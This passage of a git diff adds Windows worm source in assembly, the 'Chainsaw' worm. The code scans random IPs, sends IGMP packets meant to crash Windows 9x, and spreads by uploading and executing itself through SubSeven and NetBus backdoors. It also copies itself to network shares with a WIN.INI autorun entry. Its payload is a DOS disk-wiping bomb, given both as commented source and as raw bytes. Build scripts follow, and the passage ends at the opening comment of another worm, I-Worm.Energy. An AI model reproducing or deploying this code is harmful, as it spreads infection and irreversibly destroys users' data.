Localhost network. + JE Rand_A_Class + + SHL EBX, 8 + MOV BL, AL + + MOV Nuke_IP, EBX + MOV Sub7_IP, EBX ; Store the random IP in our + MOV NetBus_IP, EBX ; structures. + MOV NetBus_IP_2, EBX + MOV NetBios_IP, EBX + + PUSH OFFSET System_Time ; Get system date. + CALL GetSystemTime + + CMP System_Time+(3*2), 31 ; Is today nuke day? + JNE IP_To_ASCIIZ + + PUSH IPPROTO_IGMP ; Create a raw IGMP socket. + PUSH SOCK_RAW + PUSH AF_INET + CALL socket + + MOV IGMP_Socket, EAX + + INC EAX + JZ Do_Random_IP + + MOV EDI, 10 ; Send 10 nuke packets. + + ; Windows 95/98 has problems with handling fragmented IGMP + ; packets, when processing a whole bunch of these the system + ; will usually BSOD. Here we simply send a large packet (the + ; packet will arrive regardless of content it seems), which + ; will automatically be fragmented by the underlying TCP/IP + ; layers. Officially IGMP packets aren't supposed to leave + ; the current subnet, so if your ISP uses filtering (mainly + ; cable/ADSL connections), this nuke won't get through, + ; however SLIP/PPP connections (mainly dialups), seem to have + ; no problems delivering it. + +Send_Nuke: PUSH 16 ; Send the nuke. + PUSH OFFSET Nuke_Conn + PUSH 0 + PUSH 15000 + PUSH OFFSET IGMP_Nuke + PUSH IGMP_Socket + CALL sendto + + DEC EDI ; Send all 10 packets. + JNZ Send_Nuke + +Exit_Nuke: PUSH IGMP_Socket + CALL closesocket + + JMP Do_Random_IP + +IP_To_ASCIIZ: PUSH EBX ; Convert DWORD to ASCIIZ + CALL inet_ntoa ; for the NetBios API's. + + XCHG ESI, EAX + MOV EDI, OFFSET NetBios_Remote+2 + + ; Copy the ASCIIZ IP to our own buffer. + +Copy_ASCIIZ_IP: LODSB + STOSB + + OR AL, AL ; Did entire ASCIIZ string? + JNZ Copy_ASCIIZ_IP + + PUSH 0 ; Create sockets. + PUSH SOCK_STREAM + PUSH AF_INET + CALL socket + + MOV Sub7_Socket, EAX + + INC EAX + JZ Chk_Inet_State + + PUSH 0 + PUSH SOCK_STREAM + PUSH AF_INET + CALL socket + + MOV NetBus_Socket, EAX + + INC EAX + JZ Close_Sub7 + + PUSH 0 + PUSH SOCK_STREAM + PUSH AF_INET + CALL socket + + MOV NetBios_Socket, EAX + + INC EAX + JZ Close_NetBus + + ; The standard connect() timeout interval is like 100 seconds + ; or so, obviously this is way to long for portscanning, so we + ; need to set our own timeout interval. Unfortunately Winsock + ; does not have any API that can set a connect() timeout interval + ; (neither does BSD Sockets btw). Kind of stupid, but anyways, + ; here we realize our own timeout function by first switching + ; the connect() sockets to non-blocking mode, and then running + ; select() on em with a 1500ms timeout to see if they are connected. + + PUSH OFFSET Boole_True ; Set socket to non-blocking + PUSH FIONBIO ; mode. + PUSH Sub7_Socket + CALL ioctlsocket + + PUSH OFFSET Boole_True + PUSH FIONBIO + PUSH NetBus_Socket + CALL ioctlsocket + + PUSH OFFSET Boole_True + PUSH FIONBIO + PUSH NetBios_Socket + CALL ioctlsocket + + PUSH 16 ; Connect SubSeven port. + PUSH OFFSET Sub7_Conn + PUSH Sub7_Socket + CALL connect + + PUSH 16 ; Connect NetBus port. + PUSH OFFSET NetBus_Conn + PUSH NetBus_Socket + CALL connect + + PUSH 16 ; Connect NetBios port. + PUSH OFFSET NetBios_Conn ; (only to quickly probe the + PUSH NetBios_Socket ; host for NetBios). + CALL connect + + MOV ESI, OFFSET Select_Struc + MOV EDI, OFFSET Connect_Select + + MOVSD + MOVSD + MOVSD + MOVSD + + PUSH OFFSET Time_Out ; Check if any sockets are + PUSH 0 ; writeable (connected) + PUSH OFFSET Connect_Select ; within 1500ms. + PUSH 0 + PUSH 0 + CALL select + + INC EAX ; Error? + JZ Close_NetBios + + DEC EAX ; Zero sockets connected? + JZ Close_NetBios + + PUSH OFFSET Boole_False ; Switch sockets back to + PUSH FIONBIO ; blocking mode. + PUSH Sub7_Socket + CALL ioctlsocket + + PUSH OFFSET Boole_False + PUSH FIONBIO + PUSH NetBus_Socket + CALL ioctlsocket + + MOV EBX, Sub7_Socket ; Set send/recv timeout on + CALL Set_Time_Outs ; sockets to prevent endless + ; blocking. + MOV EBX, NetBus_Socket + CALL Set_Time_Outs + + MOV EDI, OFFSET Buffer ; recv-buffer. + +Try_Sub7: PUSH 0 ; Attempt to get SubSeven + PUSH 512 ; connection reply. + PUSH EDI + PUSH Sub7_Socket + CALL recv + + INC EAX ; Not connected? + JZ Try_NetBus + + ; If it's a SubSeven server, and not password + ; protected, it should reply with 'connected', + ; and the time/date and version. + + CMP [EDI], 'nnoc' ; If we can't access the Sub7 + JNE Try_NetBus ; server, move on to NetBus. + + ; First request a file upload by sending + ; 'RTF' with the upload path connected to + ; it: 'RTFChainsaw.exe'. + + PUSH 0 + PUSH (End_S7_Upload_Req-S7_Upload_Req) + PUSH OFFSET S7_Upload_Req + PUSH Sub7_Socket + CALL send + + INC EAX + JZ Try_NetBus + + PUSH 0 ; Fetch the reply, it should + PUSH 512 ; be 'TID' if all is OK. + PUSH EDI + PUSH Sub7_Socket + CALL recv + + INC EAX + JZ Try_NetBus + + CMP [EDI], 'nDIT' ; Check for 'TID' (plus last + JNE Try_NetBus ; byte of previous recv). + + ; First let the server know the filesize of the + ; upload, this is done by sending a 'SFT' + the + ; length of the filesize (represented by two + ; numbers) + the actual filesize: 'SFT046144'. + + PUSH 0 + PUSH (End_S7_Upload_Size-S7_Upload_Size) + PUSH OFFSET S7_Upload_Size + PUSH Sub7_Socket + CALL send + + INC EAX + JZ Try_NetBus + + PUSH 0 ; Then send the actual file + PUSH Worm_Size ; contents. + PUSH OFFSET Worm_Code + PUSH Sub7_Socket + CALL send + + INC EAX + JZ Try_NetBus + + ; SubSeven works with a 1041-byte receive buffer, every + ; 1041 or less bytes received will be acknowledged with + ; a 'p:' + the total amount of bytes received + '.'. + +Retrieve_Ack: PUSH 0 ; Receive a 7-byte 'p:xxxx.' + PUSH 7 ; (don't read more than 7 + PUSH EDI ; bytes as often the data is + PUSH Sub7_Socket ; overlapping). + CALL recv + + INC EAX + JZ Try_NetBus + + CMP [EDI+2], '4416' ; Last acknowledgement? + JNE Retrieve_Ack ; Otherwise just go on. + + ; Check upload reply, which should be 'file successfully uploaded.' + ; if all went fine, (however it seems to return this regardless of + ; success or failure..). + +Check_UL_Reply: PUSH 0 + PUSH 512 + PUSH EDI + PUSH Sub7_Socket + CALL recv + + INC EAX + JZ Try_NetBus + + CMP [EDI+5], 'ccus' ; Check for 'success'. + JNE Try_NetBus ; Bail on error. + + ; Now remotely execute the uploaded worm copy by sending a + ; 'FMX' + the path of the file to execute: 'FMXChainsaw.exe'. + ; SubSeven uses ShellExecuteA to run files, so it is capable + ; of opening any registered file extension such as .VBS etc. + + PUSH 0 + PUSH (End_S7_Exec_Req-S7_Exec_Req) + PUSH OFFSET S7_Exec_Req + PUSH Sub7_Socket + CALL send + + INC EAX + JZ Try_NetBus + + PUSH 0 ; Fetch the command reply, + PUSH 512 ; which should be + PUSH EDI ; 'file has been executed.'. + PUSH Sub7_Socket + CALL recv + +Try_NetBus: PUSH 0 ; Fetch connection reply. + PUSH 512 + PUSH EDI + PUSH NetBus_Socket + CALL recv + + INC EAX + JZ Try_NetBios + + ; NetBus servers respond with 'NetBus', and + ; the version, and if the server is password + ; protected also with an 'x'. + + CMP [EDI], 'BteN' ; Is it an actual NetBus + JNE Try_NetBios ; server? + + ; Server is password protected? + + CMP BYTE PTR [EDI+EAX-3], 'x' + JNE Upload_Worm + + ; Now try one password, 'netbus' (should be commonly used + ; I guess), together with a NetBus 1.60- backdoor function + ; that accepts any password. + + PUSH 0 + PUSH (End_NB_Password-NB_Password) + PUSH OFFSET NB_Password + PUSH NetBus_Socket + CALL send + + INC EAX + JZ Try_NetBios + + PUSH 0 ; Get password reply. + PUSH 512 + PUSH EDI + PUSH NetBus_Socket + CALL recv + + INC EAX + JZ Try_NetBios + + ; If the password got accepted then it + ; should return 'Access;1'. + + CMP [EDI+4], '1;ss' ; 'Access;1' ? + JNE Try_NetBios + + ; Request a file upload by sending 'UploadFile;' + ; + filename + ';' + filesize + ';' + upload path: + ; 'UploadFile;Chainsaw.exe;6144;\'. + +Upload_Worm: PUSH 0 + PUSH (End_NB_Upload_Req-NB_Upload_Req) + PUSH OFFSET NB_Upload_Req + PUSH NetBus_Socket + CALL send + + INC EAX + JZ Try_NetBios + + PUSH 0 ; Fetch upload reply which + PUSH 512 ; should be 'UploadReady'. + PUSH EDI + PUSH NetBus_Socket + CALL recv + + INC EAX + JZ Try_NetBios + + CMP [EDI+4], 'eRda' ; 'UploadReady' ? + JNE Try_NetBios + + ; Now connect to port number , + ; which will handle the upload file content. + + PUSH 0 ; Create a socket for the + PUSH SOCK_STREAM ; upload connection. + PUSH AF_INET + CALL socket + + MOV NetBus_Socket_2, EAX + + INC EAX + JZ Try_NetBios + + MOV EBX, NetBus_Socket_2 + CALL Set_Time_Outs + + PUSH 16 ; Connect the upload socket. + PUSH OFFSET NetBus_Conn_2 + PUSH NetBus_Socket_2 + CALL connect + + XCHG EBX, EAX + + OR EBX, EBX + JNZ Close_NetBus_2 + + PUSH 0 ; Send through the upload + PUSH Worm_Size ; file contents. + PUSH OFFSET Worm_Code + PUSH NetBus_Socket_2 + CALL send + + XCHG EBX, EAX + +Close_NetBus_2: PUSH NetBus_Socket_2 + CALL closesocket + + INC EBX + JZ Close_NetBios + + ; Now remotely execute the worm on the target's + ; system by sending 'StartApp;' + path to program: + ; 'StartApp;\Chainsaw.exe'. + + PUSH 0 + PUSH (End_NB_Exec_File-NB_Exec_File) + PUSH OFFSET NB_Exec_File + PUSH NetBus_Socket + CALL send + +Try_NetBios: MOV ESI, OFFSET Net_Resource_Struc + MOV EDI, OFFSET Net_Resource + + MOV ECX, 8 + REP MOVSD + + CALL Locate_Shares ; Infect all shared drives. + +Close_NetBios: PUSH NetBios_Socket + CALL closesocket + +Close_NetBus: PUSH NetBus_Socket + CALL closesocket + +Close_Sub7: PUSH Sub7_Socket + CALL closesocket + + JMP Chk_Inet_State + + +; Set the recv/send timeout to 5 seconds to prevent endless blocking. +Set_Time_Outs: + PUSH 4 + PUSH OFFSET IO_Time_Out + PUSH SO_RCVTIMEO + PUSH SOL_SOCKET + PUSH EBX + CALL setsockopt + + PUSH 4 + PUSH OFFSET IO_Time_Out + PUSH SO_SNDTIMEO + PUSH SOL_SOCKET + PUSH EBX + CALL setsockopt + + RETN + + +Random_AL_254: + MOV AL, 254 + +Random_AL: MOVZX EAX, AL + +Random_EAX: PUSH EAX + + CALL GetTickCount + + ADD EAX, Random_Init + JNP Xor_In_Init + + RCL EAX, 2 + XCHG AL, AH + ADD AL, 66h + +Xor_In_Init: NOT EAX + + PUSH 32 + POP ECX + +CRC_Bit: SHR EAX, 1 + JNC Loop_CRC_Bit + + XOR EAX, 0EDB88320h + +Loop_CRC_Bit: LOOP CRC_Bit + + POP ECX + + XOR EDX, EDX + DIV ECX + + XCHG EDX, EAX + INC EAX ; Can't be zero. + + ROL Random_Init, 1 ; Adjust random seed. + + RETN + + +; And I thought NetBus was a lame buggy piece of shit, nothing beats +; SubSeven, even though it's the one of the most advanched RAT's +; available these days, it is programmed pretty badly, the author +; clearly has no understanding of TCP/IP whatsoever, he doesn't +; even terminate his TCP commands with a terminator for example, +; which will lead to fragmented packets fucking up. Also, when you +; supply wrong commands to the server, it will downright hang itself. +; And as a bonus, SubSeven infected systems become slooow, not sure +; exactly why.. I'd say, leave writing RAT's to people who know +; their stuff, like the authors of Back Orifice 2000. + + +; Recursively scans the host's resources for shared drives. +Locate_Shares: + PUSHAD + + PUSH OFFSET Enum_Handle ; Start enumerating all + PUSH OFFSET Net_Resource ; shared drives. + PUSH 0 + PUSH RESOURCETYPE_DISK + PUSH RESOURCE_GLOBALNET + CALL WNetOpenEnumA + + OR EAX, EAX + JNZ Exit_Loc_Share + + MOV EBX, Enum_Handle + +Enum_Resource: MOV Net_Struc_Count, 1 + + PUSH OFFSET Enum_Buf_Size ; Find shared drive. + PUSH OFFSET Net_Resource + PUSH OFFSET Net_Struc_Count + PUSH EBX + CALL WNetEnumResourceA + + OR EAX, EAX + JNZ Close_Enum + + CMP Net_Usage, RESOURCEUSAGE_CONTAINER + JNE Infect_Share + + CALL Locate_Shares + + JMP Enum_Resource + +Infect_Share: MOV Net_Local_Name, OFFSET Remote_Drive + + PUSH 0 ; Map the shared drive to + PUSH 0 ; 'T:'. + PUSH 0 + PUSH OFFSET Net_Resource + CALL WNetAddConnection2A + + OR EAX, EAX + JNZ Enum_Resource + + PUSH 1 ; Copy Chainsaw.exe to the + PUSH OFFSET Remote_Trojan ; root of this shared drive. + PUSH OFFSET Own_Path + CALL CopyFileA + + XCHG ECX, EAX + JECXZ Un_Map_Share + + PUSH OFFSET MsDos_Sys ; Attempt to get the Win9x + PUSH 260 ; directory. + PUSH OFFSET Win_Dir + PUSH OFFSET Default_String + PUSH OFFSET Win_Dir_Key + PUSH OFFSET Paths_Section + CALL GetPrivateProfileStringA + + XCHG ECX, EAX + JECXZ Un_Map_Share + + LEA EDI, [Win_Dir+ECX] ; Append '\WIN.INI' to it. + MOV ESI, OFFSET Slash_Win_Ini + MOV ECX, 9 + REP MOVSB + + PUSH OFFSET Win_Dir ; Add 'run=\Chainsaw.exe' to + PUSH OFFSET Root_Dropper ; Win9x's WIN.INI. + PUSH OFFSET Win_Ini_Run_Key + PUSH OFFSET Windows_Section + CALL WritePrivateProfileStringA + + XCHG ECX, EAX + JECXZ Un_Map_Share + + PUSH FILE_ATTRIBUTE_HIDDEN ; Hide the drop file. + PUSH OFFSET Remote_Trojan + CALL SetFileAttributesA + +Un_Map_Share: PUSH 0 ; Unmap shared drive. + PUSH 0 + PUSH OFFSET Remote_Drive + CALL WNetCancelConnection2A + + JMP Enum_Resource + +Close_Enum: PUSH EBX + CALL WNetCloseEnum + +Exit_Loc_Share: POPAD + + RETN + + +; Ima go woop yo ass boy! +Payload: + PUSH 0 + PUSH 0 + PUSH CREATE_ALWAYS + PUSH 0 + PUSH 0 + PUSH GENERIC_WRITE + PUSH OFFSET Nuke_File + CALL CreateFileA + + XCHG EBX, EAX + + PUSH 0 ; Write bomb. + PUSH OFFSET Temp + PUSH 666 + PUSH OFFSET DOS_Bomb + PUSH EBX + CALL WriteFile + + PUSH EBX + CALL CloseHandle + + PUSH 0 ; Run the bomb (only WinExec + PUSH OFFSET Nuke_File ; is capable of running DOS + CALL WinExec ; files too). + + JMP $ ; Heart stops.. + + + ; Bomb in DOS COM-format, this way it works both on 95/98 and NT/2K. + ; Smashes disk structures of 1st 2 fixed disks, should be fast and + ; unrecoverable. + +; .MODEL TINY +; .CODE +; +; ORG 100h +;START: +; MOV AX, 3513h ; Grab INT 13h's address. +; INT 21h +; +; MOV Int13h, BX ; Store it for later. +; MOV Int13h+2, ES +; +; PUSH CS +; POP ES +; +; XOR SI, SI +; +; MOV BX, OFFSET Trash_Text +; MOV CX, (End_Trash_Text-Trash_Text) +; +; ; Decrypt trash text. +; +;Decrypt_Text: XOR BYTE PTR [BX+SI], 66h +; +; INC SI +; +; LOOP Decrypt_Text +; +; INC CX ; CX = 0001h. +; +; MOV DX, 80h+1 ; Start trashing backwards +; ; from 2nd HDD. +; +;Kill_Head: MOV AX, 0302h ; Smash 2 sectors of track +; PUSHF ; 0 with our text. +; DB 9Ah +;Int13h DW 0, 0 +; +; INC DH ; Smashed all heads? +; JNZ Kill_Head +; +; DEC DL ; Smashed all HDD's ? +; JS Kill_Head +; +;Exit: RETN ; Back to Windoze.. +; +; DB 'T2' ; To pad this file to 666. +; +; ; XOR 66h encrypted: +; +; ; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE +; ; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR +; ; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL +; ; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY +; ; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED +; ; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND +; ; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC +; ; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF +; ; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST +; ; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY, +; ; THE TEXAS CHAIN SAW MASSACRE..." +; +; ; (I adore this movie :) +; +;Trash_Text: DB 44h, 32h, 2Eh, 23h, 46h, 20h, 2Fh, 2Ah, 2Bh, 46h +; DB 31h, 2Eh, 2Fh, 25h, 2Eh, 46h, 3Fh, 29h, 33h, 46h +; DB 27h, 34h, 23h, 46h, 27h, 24h, 29h, 33h, 32h, 46h +; DB 32h, 29h, 46h, 35h, 23h, 23h, 46h, 2Fh, 35h, 46h +; DB 27h, 28h, 46h, 27h, 25h, 25h, 29h, 33h, 28h, 32h +; DB 46h, 29h, 20h, 46h, 32h, 2Eh, 23h, 6Bh, 6Ch, 32h +; DB 34h, 27h, 21h, 23h, 22h, 3Fh, 46h, 31h, 2Eh, 2Fh +; DB 25h, 2Eh, 46h, 24h, 23h, 20h, 23h, 2Ah, 2Ah, 46h +; DB 27h, 46h, 21h, 34h, 29h, 33h, 36h, 46h, 29h, 20h +; DB 46h, 20h, 2Fh, 30h, 23h, 46h, 3Fh, 29h, 33h, 32h +; DB 2Eh, 35h, 48h, 46h, 2Fh, 28h, 46h, 36h, 27h, 34h +; DB 32h, 2Fh, 25h, 33h, 2Ah, 27h, 34h, 6Bh, 6Ch, 35h +; DB 27h, 2Ah, 2Ah, 3Fh, 46h, 2Eh, 27h, 34h, 22h, 23h +; DB 35h, 32h, 3Fh, 46h, 27h, 28h, 22h, 46h, 2Eh, 23h +; DB 34h, 46h, 2Fh, 28h, 30h, 27h, 2Ah, 2Fh, 22h, 46h +; DB 24h, 34h, 29h, 32h, 2Eh, 23h, 34h, 46h, 20h, 34h +; DB 27h, 28h, 2Dh, 2Ah, 2Fh, 28h, 48h, 46h, 2Fh, 32h +; DB 46h, 2Fh, 35h, 46h, 27h, 2Ah, 2Ah, 6Bh, 6Ch, 32h +; DB 2Eh, 23h, 46h, 2Bh, 29h, 34h, 23h, 46h, 32h, 34h +; DB 27h, 21h, 2Fh, 25h, 46h, 2Fh, 28h, 46h, 32h, 2Eh +; DB 27h, 32h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h +; DB 34h, 23h, 46h, 3Fh, 29h, 33h, 28h, 21h, 48h, 46h +; DB 24h, 33h, 32h, 4Ah, 46h, 2Eh, 27h, 22h, 46h, 32h +; DB 2Eh, 23h, 3Fh, 6Bh, 6Ch, 2Ah, 2Fh, 30h, 23h, 22h +; DB 46h, 30h, 23h, 34h, 3Fh, 4Ah, 46h, 30h, 23h, 34h +; DB 3Fh, 46h, 2Ah, 29h, 28h, 21h, 46h, 2Ah, 2Fh, 30h +; DB 23h, 35h, 4Ah, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 25h +; DB 29h, 33h, 2Ah, 22h, 46h, 28h, 29h, 32h, 46h, 2Eh +; DB 27h, 30h, 23h, 46h, 23h, 3Eh, 36h, 23h, 25h, 32h +; DB 23h, 22h, 6Bh, 6Ch, 28h, 29h, 34h, 46h, 31h, 29h +; DB 33h, 2Ah, 22h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 2Eh +; DB 27h, 30h, 23h, 46h, 31h, 2Fh, 35h, 2Eh, 23h, 22h +; DB 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h, 27h, 35h +; DB 46h, 2Bh, 33h, 25h, 2Eh, 46h, 29h, 20h, 46h, 32h +; DB 2Eh, 23h, 46h, 2Bh, 27h, 22h, 46h, 27h, 28h, 22h +; DB 6Bh, 6Ch, 2Bh, 27h, 25h, 27h, 24h, 34h, 23h, 46h +; DB 27h, 35h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h +; DB 34h, 23h, 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h +; DB 32h, 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 48h, 46h +; DB 20h, 29h, 34h, 46h, 32h, 2Eh, 23h, 2Bh, 46h, 27h +; DB 28h, 46h, 2Fh, 22h, 3Fh, 2Ah, 2Ah, 2Fh, 25h, 6Bh +; DB 6Ch, 35h, 33h, 2Bh, 2Bh, 23h, 34h, 46h, 27h, 20h +; DB 32h, 23h, 34h, 28h, 29h, 29h, 28h, 46h, 22h, 34h +; DB 2Fh, 30h, 23h, 46h, 24h, 23h, 25h, 27h, 2Bh, 23h +; DB 46h, 27h, 46h, 28h, 2Fh, 21h, 2Eh, 32h, 2Bh, 27h +; DB 34h, 23h, 48h, 46h, 32h, 2Eh, 23h, 46h, 23h, 30h +; DB 23h, 28h, 32h, 35h, 46h, 29h, 20h, 6Bh, 6Ch, 32h +; DB 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 46h, 31h, 23h +; DB 34h, 23h, 46h, 32h, 29h, 46h, 2Ah, 23h, 27h, 22h +; DB 46h, 32h, 29h, 46h, 32h, 2Eh, 23h, 46h, 22h, 2Fh +; DB 35h, 25h, 29h, 30h, 23h, 34h, 3Fh, 46h, 29h, 20h +; DB 46h, 29h, 28h, 23h, 46h, 29h, 20h, 46h, 32h, 2Eh +; DB 23h, 46h, 2Bh, 29h, 35h, 32h, 6Bh, 6Ch, 24h, 2Fh +; DB 3Ch, 27h, 34h, 34h, 23h, 46h, 25h, 34h, 2Fh, 2Bh +; DB 23h, 35h, 46h, 2Fh, 28h, 46h, 32h, 2Eh, 23h, 46h +; DB 27h, 28h, 28h, 27h, 2Ah, 35h, 46h, 29h, 20h, 46h +; DB 27h, 2Bh, 23h, 34h, 2Fh, 25h, 27h, 28h, 46h, 2Eh +; DB 2Fh, 35h, 32h, 29h, 34h, 3Fh, 4Ah, 6Bh, 6Ch, 32h +; DB 2Eh, 23h, 46h, 32h, 23h, 3Eh, 27h, 35h, 46h, 25h +; DB 2Eh, 27h, 2Fh, 28h, 46h, 35h, 27h, 31h, 46h, 2Bh +; DB 27h, 35h, 35h, 27h, 25h, 34h, 23h, 48h, 48h, 48h +; DB 44h, 6Bh, 6Ch +;End_Trash_Text: +; END START + +DOS_Bomb: DB 0B8h, 013h, 035h, 0CDh, 021h, 089h, 01Eh, 026h, 001h + DB 08Ch, 006h, 028h, 001h, 00Eh, 007h, 033h, 0F6h, 0BBh + DB 035h, 001h, 0B9h, 065h, 002h, 080h, 030h, 066h, 046h + DB 0E2h, 0FAh, 041h, 0BAh, 081h, 000h, 0B8h, 002h, 003h + DB 09Ch, 09Ah, 000h, 000h, 000h, 000h, 0FEh, 0C6h, 075h + DB 0F3h, 0FEh, 0CAh, 078h, 0EFh, 0C3h, 054h, 032h, 044h + DB 032h, 02Eh, 023h, 046h, 020h, 02Fh, 02Ah, 02Bh, 046h + DB 031h, 02Eh, 02Fh, 025h, 02Eh, 046h, 03Fh, 029h, 033h + DB 046h, 027h, 034h, 023h, 046h, 027h, 024h, 029h, 033h + DB 032h, 046h, 032h, 029h, 046h, 035h, 023h, 023h, 046h + DB 02Fh, 035h, 046h, 027h, 028h, 046h, 027h, 025h, 025h + DB 029h, 033h, 028h, 032h, 046h, 029h, 020h, 046h, 032h + DB 02Eh, 023h, 06Bh, 06Ch, 032h, 034h, 027h, 021h, 023h + DB 022h, 03Fh, 046h, 031h, 02Eh, 02Fh, 025h, 02Eh, 046h + DB 024h, 023h, 020h, 023h, 02Ah, 02Ah, 046h, 027h, 046h + DB 021h, 034h, 029h, 033h, 036h, 046h, 029h, 020h, 046h + DB 020h, 02Fh, 030h, 023h, 046h, 03Fh, 029h, 033h, 032h + DB 02Eh, 035h, 048h, 046h, 02Fh, 028h, 046h, 036h, 027h + DB 034h, 032h, 02Fh, 025h, 033h, 02Ah, 027h, 034h, 06Bh + DB 06Ch, 035h, 027h, 02Ah, 02Ah, 03Fh, 046h, 02Eh, 027h + DB 034h, 022h, 023h, 035h, 032h, 03Fh, 046h, 027h, 028h + DB 022h, 046h, 02Eh, 023h, 034h, 046h, 02Fh, 028h, 030h + DB 027h, 02Ah, 02Fh, 022h, 046h, 024h, 034h, 029h, 032h + DB 02Eh, 023h, 034h, 046h, 020h, 034h, 027h, 028h, 02Dh + DB 02Ah, 02Fh, 028h, 048h, 046h, 02Fh, 032h, 046h, 02Fh + DB 035h, 046h, 027h, 02Ah, 02Ah, 06Bh, 06Ch, 032h, 02Eh + DB 023h, 046h, 02Bh, 029h, 034h, 023h, 046h, 032h, 034h + DB 027h, 021h, 02Fh, 025h, 046h, 02Fh, 028h, 046h, 032h + DB 02Eh, 027h, 032h, 046h, 032h, 02Eh, 023h, 03Fh, 046h + DB 031h, 023h, 034h, 023h, 046h, 03Fh, 029h, 033h, 028h + DB 021h, 048h, 046h, 024h, 033h, 032h, 04Ah, 046h, 02Eh + DB 027h, 022h, 046h, 032h, 02Eh, 023h, 03Fh, 06Bh, 06Ch + DB 02Ah, 02Fh, 030h, 023h, 022h, 046h, 030h, 023h, 034h + DB 03Fh, 04Ah, 046h, 030h, 023h, 034h, 03Fh, 046h, 02Ah + DB 029h, 028h, 021h, 046h, 02Ah, 02Fh, 030h, 023h, 035h + DB 04Ah, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 025h, 029h + DB 033h, 02Ah, 022h, 046h, 028h, 029h, 032h, 046h, 02Eh + DB 027h, 030h, 023h, 046h, 023h, 03Eh, 036h, 023h, 025h + DB 032h, 023h, 022h, 06Bh, 06Ch, 028h, 029h, 034h, 046h + DB 031h, 029h, 033h, 02Ah, 022h, 046h, 032h, 02Eh, 023h + DB 03Fh, 046h, 02Eh, 027h, 030h, 023h, 046h, 031h, 02Fh + DB 035h, 02Eh, 023h, 022h, 046h, 032h, 029h, 046h, 035h + DB 023h, 023h, 046h, 027h, 035h, 046h, 02Bh, 033h, 025h + DB 02Eh, 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h + DB 02Bh, 027h, 022h, 046h, 027h, 028h, 022h, 06Bh, 06Ch + DB 02Bh, 027h, 025h, 027h, 024h, 034h, 023h, 046h, 027h + DB 035h, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 031h, 023h + DB 034h, 023h, 046h, 032h, 029h, 046h, 035h, 023h, 023h + DB 046h, 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh + DB 048h, 046h, 020h, 029h, 034h, 046h, 032h, 02Eh, 023h + DB 02Bh, 046h, 027h, 028h, 046h, 02Fh, 022h, 03Fh, 02Ah + DB 02Ah, 02Fh, 025h, 06Bh, 06Ch, 035h, 033h, 02Bh, 02Bh + DB 023h, 034h, 046h, 027h, 020h, 032h, 023h, 034h, 028h + DB 029h, 029h, 028h, 046h, 022h, 034h, 02Fh, 030h, 023h + DB 046h, 024h, 023h, 025h, 027h, 02Bh, 023h, 046h, 027h + DB 046h, 028h, 02Fh, 021h, 02Eh, 032h, 02Bh, 027h, 034h + DB 023h, 048h, 046h, 032h, 02Eh, 023h, 046h, 023h, 030h + DB 023h, 028h, 032h, 035h, 046h, 029h, 020h, 06Bh, 06Ch + DB 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh, 046h + DB 031h, 023h, 034h, 023h, 046h, 032h, 029h, 046h, 02Ah + DB 023h, 027h, 022h, 046h, 032h, 029h, 046h, 032h, 02Eh + DB 023h, 046h, 022h, 02Fh, 035h, 025h, 029h, 030h, 023h + DB 034h, 03Fh, 046h, 029h, 020h, 046h, 029h, 028h, 023h + DB 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h, 02Bh + DB 029h, 035h, 032h, 06Bh, 06Ch, 024h, 02Fh, 03Ch, 027h + DB 034h, 034h, 023h, 046h, 025h, 034h, 02Fh, 02Bh, 023h + DB 035h, 046h, 02Fh, 028h, 046h, 032h, 02Eh, 023h, 046h + DB 027h, 028h, 028h, 027h, 02Ah, 035h, 046h, 029h, 020h + DB 046h, 027h, 02Bh, 023h, 034h, 02Fh, 025h, 027h, 028h + DB 046h, 02Eh, 02Fh, 035h, 032h, 029h, 034h, 03Fh, 04Ah + DB 06Bh, 06Ch, 032h, 02Eh, 023h, 046h, 032h, 023h, 03Eh + DB 027h, 035h, 046h, 025h, 02Eh, 027h, 02Fh, 028h, 046h + DB 035h, 027h, 031h, 046h, 02Bh, 027h, 035h, 035h, 027h + DB 025h, 034h, 023h, 048h, 048h, 048h, 044h, 06Bh, 06Ch + + END START + + ; *shrug*, haven't really finished this piece-o-crap, + ; mainly because I got fed up with all them bugs in + ; the server programs.. also not sure if the NetBios + ; shit works on remotes.. oh fuck it :| +[CHAINSAW.ASM] +[CHAINSAW.RC] +I ICON DISCARDABLE "BLACK.ICO" +[CHAINSAW.RC] +[Q.BAT] +TASM32 CHAINSAW.ASM /ml /m +TLINK32 CHAINSAW.OBJ C:\TASM\LIB\IMPORT32.LIB WININET.LIB -aa +BRC32 CHAINSAW.RC +UPX\UPX CHAINSAW.EXE --force +[Q.BAT] diff --git a/Win32/I-Worm.Energy.asm b/Win32/I-Worm.Energy.asm new file mode 100644 index 00000000..f3d1ce6a --- /dev/null +++ b/Win32/I-Worm.Energy.asm @@ -0,0 +1,727 @@ + +COMMENT # + + Ŀ + I-Worm.Energy + + Ŀ + by Benny/29A + + +hey all... + + +it was one b0ring sunday, when I decided to code some small and kewl virus... +I was tired from coding large projectz (HIV, XTC)... I wanted to code one +worm with some nice ideaz, like the Win2k.Stream. + +and here it is. after some meditationz, full of experiencez from psychedelics +I decided to call this worm "Energy"... it is 